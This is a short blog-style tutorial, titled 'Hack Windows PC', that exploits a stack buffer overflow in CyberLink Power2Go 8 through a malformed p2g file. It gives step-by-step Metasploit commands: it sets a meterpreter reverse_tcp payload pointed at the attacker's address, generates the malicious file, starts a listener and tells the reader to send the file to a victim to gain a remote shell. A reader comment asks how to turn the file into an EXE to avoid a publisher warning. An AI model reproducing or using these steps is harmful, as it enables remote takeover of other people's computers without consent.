Hack Windows PC using Cyber Link Power2Go name attribute (p2g) Stack Buffer Overflow Exploit

This module exploits a stack buffer overflow in Cyber Link Power2Go version 8.x the vulnerability is triggered when opening a malformed p2g file containing an overly long string in the ‘name’ attribute of the file element. This results in overwriting a structured exception handler record.

Exploit Targets

CyberLink Power2Go 8

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/windows/fileformat/cyberlink_p2g_bof

msf exploit (cyberlink_p2g_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (cyberlink_p2g_bof)>set lhost 192.168.1.2 (IP of Local Host)

msf exploit (cyberlink_p2g_bof)>exploit

After we successfully generate the malicious p2g File, it will stored on your local computer

/root/.msf4/local/msf.p2g

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.2

exploit

Now send your msf.p2g files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

For More Meterpreter Commands Click Here

3 Comments Hack Windows PC using Cyber Link Power2Go name attribute (p2g) Stack Buffer Overflow Exploit

  1. Tigerboy

    After creating msf.p2g file.when it is Run on victim pc(windows 7)..it gives error(Unknown publisher)…….if it is necessary to convert in .EXE….plz tell me the name of .EXE maker…………..I like u r post

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *